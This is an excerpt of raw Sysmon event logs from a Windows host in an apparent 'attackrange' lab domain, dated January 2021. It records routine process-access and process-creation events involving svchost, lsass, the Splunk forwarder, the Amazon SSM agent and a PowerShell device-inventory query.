13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.710{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.704{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.704{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.622{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_nm4iatmj.hja.ps12021-01-18 13:34:22.622 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.582{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.579{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.580{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.544{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.538{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 